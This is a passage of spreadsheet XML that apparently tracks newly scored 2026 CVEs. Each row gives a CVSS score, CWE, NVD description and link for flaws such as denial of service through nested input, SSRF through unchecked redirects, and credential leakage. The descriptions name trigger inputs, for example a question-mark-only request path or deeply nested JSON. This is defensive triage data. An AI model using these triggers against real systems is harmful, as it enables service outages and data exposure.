      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>dd-trace-rs provides Datadog application performance monitoring for Rust. From 0.1.0 until 0.3.3, datadog-opentelemetry/src/propagation/tracecontext.rs parses the W3C tracestate header and collects every semicolon-separated key and value pair in the Datadog dd=... vendor entry into a HashMap without enforcing a pair count or entry size limit. Because tracecontext extraction is enabled by default, a remote unauthenticated attacker can send an arbitrarily large dd=... entry and force excessive CPU and memory consumption for each request, causing denial of service in an instrumented network service. This vulnerability is fixed in 0.3.3.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54788</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55099</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>icalendar is an RFC 5545 compatible parser and generator of iCalendar files for Python. From 7.1.0 until 7.1.3, the Component equality method in src/icalendar/cal/component.py compares nested subcomponents with two membership loops, and each membership test invokes the same method on child components, causing O(2^n) work relative to nesting depth. Component.from_ical accepts arbitrarily nested BEGIN:VEVENT blocks without a depth limit, so an attacker can submit a sub-kilobyte .ics file containing equal nested subtrees and trigger the cost when an application performs equality, inequality, membership, deduplication, test-assertion, round-trip, or normalization comparisons. Parsing alone does not trigger the issue, and comparisons that differ early short-circuit, but a few hundred bytes can pin a CPU core for minutes or indefinitely, causing denial of service in calendar sync or import endpoints, invite processing, and other comparison paths. This issue is fixed in version 7.1.3.</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55099</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55484</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-754</t>
        </is>
      </c>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>ALOS HTTP is a Linux-first Go web framework and application server built around a custom networking stack. Prior to 0.0.0-20260617230736-314b6783e196, core/utils.go::sanitizeRequestPath calls splitPathQuery on a request path beginning with a question mark and then performs the unchecked p[0] access without checking whether the resulting path is empty. An unauthenticated client can send a malformed request such as a question-mark-only path through h1_plain.go::ParseH1RequestHead, hpack.go::decodeSimpleGetPathHTTPSRequest, hpack.go::observeHeader, or h3_conn.go::handleRequestStream, causing an out-of-bounds panic before core.Recovery() middleware runs and terminating the server process. This issue is fixed in pseudo-version 0.0.0-20260617230736-314b6783e196.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55484</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55525</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the web_crawl function validates only the initial URL before _crawl_with_httpx uses httpx.Client(follow_redirects=True). Redirect targets are not revalidated, so an attacker who influences a crawl target can redirect a public URL to loopback, private network, or cloud metadata services while ALLOW_LOCAL_CRAWL remains disabled. The fetched internal response is returned to the agent context. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55525</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55553</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201, CWE-522</t>
        </is>
      </c>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>urllib is an HTTP client for Node.js that supports authentication, redirects, timeouts, and other request features. Prior to 4.9.1 and 2.44.1, urllib follows redirects through followRedirect but reuses caller-supplied options across origins. In src/HttpClient.ts, #requestInternal recursively calls this.#requestInternal(nextUrl.href, options, requestContext), causing options.headers and auth or digestAuth values to be reused when the redirect target has a different scheme, host, or port. Authorization, Cookie, Proxy-Authorization, x-api-key, x-auth-token, and x-access-token can therefore be sent to an attacker-controlled redirected origin, exposing credentials intended for the original origin and potentially allowing reuse against the original partner API or related services. No user interaction is required. This issue is fixed in versions 2.44.1 and 4.9.1.</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55553</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55584</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>phpSysInfo is a customizable PHP script that displays system information. Prior to 3.4.6, the PSI_ALLOWED access-control check in read_config.php trusts attacker-controlled X-Forwarded-For and Client-IP HTTP headers before REMOTE_ADDR. A remote unauthenticated attacker can supply an allowed address in one of these headers to impersonate a trusted client and access exposed hostname, kernel, CPU, memory, filesystem, and network-interface information. This issue is fixed in version 3.4.6.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55584</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55620</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.routing.noparenthesis in eml_parser/routing.py removes parenthesized CFWS comments from Received: headers with a regex-based fix-point loop whose running time is quadratic in the nesting depth. A single Received: header with 5,000 nested parentheses causes approximately 1.3 seconds of CPU saturation per parsed message, and doubling the nesting depth approximately quadruples the running time. An attacker can submit relatively small EML files that consume multiple seconds of processing time, causing worker latency, queue backpressure, and possible service-level outages in synchronous gateways, sandboxes, and real-time triage pipelines. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55620</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55841</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr">
        <is>
          <t>CWE-138</t>
        </is>
      </c>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. Prior to Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3, the FortiGate key-value syslog parser in graylog2-server/src/main/java/org/graylog2/inputs/codecs/GLFortiGateSyslogEvent.java and graylog2-server/src/main/java/org/graylog2/inputs/codecs/SyslogCodec.java mishandles field-like text inside quoted values. GLFortiGateSyslogEvent.getFields() uses KV_PATTERN and QUOTED_KV_PATTERN, while SyslogCodec.parse() invokes the FortiGateSyslogEvent parser; crafted values containing = or backslash-escaped quotes can cause embedded keys such as srcip, dstip, date, time, and tz to remove or overwrite original top-level fields or produce an invalid message that Graylog discards. An unauthenticated network sender who can submit syslog messages can therefore manipulate security-log fields or evade logging to obscure malicious activity. This issue is fixed in Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3.</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55841</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5680</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Undertow. A remote attacker could exploit this vulnerability by sending specially crafted WebSocket messages with permessage-deflate negotiated. This could lead to excessive memory consumption due to the PerMessageDeflateFunction.largerBuffer() method using exponential doubling, resulting in a Denial of Service (DoS) for the affected application.</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5680</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63421</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-480</t>
        </is>
      </c>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>Keystone is a content management system for Node.js. Prior to 6.5.3, the findMany resolver in packages/core/src/lib/core/queries/resolvers.ts compares the signed take argument directly with graphql.maxTake, allowing a remote unauthenticated GraphQL client to provide a negative take value whose magnitude exceeds the configured bound. The bypass also applies to relationship queries and can return more records than the developer intended, potentially exhausting service resources. This issue is fixed in version 6.5.3.</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63421</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63462</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the shared OpenAPI validation error path in src/lib/error/bad-data-error.ts passes a raw request value from lodash.get to JSON.stringify in genericErrorMessage and fromOpenApiValidationErrors without guarding stack exhaustion. An unauthenticated attacker can send a roughly 10 KB JSON value nested thousands of levels deep to POST /edge/validate, POST /edge/issue-token, or another OpenAPI-validated endpoint, causing RangeError: Maximum call stack size exceeded in openAPIValidationMiddleware and terminating the Node process because no uncaughtException handler recovers it. Replaying the request can sustain a complete service outage. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63462</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63495</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. From 2.2.0-alpha-dev until 2.2.2-alpha, the libevent WebSocket server in ws.c accumulates fragmented frames in evws-&gt;incomplete_frames without enforcing a total message-size limit. An unauthenticated remote client can repeatedly send fragmented WebSocket frames below WS_MAX_RECV_FRAME_SZ with FIN=0, causing the evbuffer to grow without bound until the process or host exhausts memory. This issue is fixed in version 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63495</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71360</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr">
        <is>
          <t>adobe:c2pa, adobe:c2patool</t>
        </is>
      </c>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>CAI Content Credentials is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71360</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71626</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>An issue in Invoice Ninja v5.13.24 allows a remote attacker to obtain sensitive information via the StoreWebhookRequest.php, UpdateWebhookRequest.php, and WebhookSingle.php components</t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71626</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73786</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of CPPM could allow an unauthenticated remote attacker to conduct a Denial-of-Service (DoS) attack. Successful exploitation could allow an attacker to cause instability and degrade performance of the vulnerable CPPM server.</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73786</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74761</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
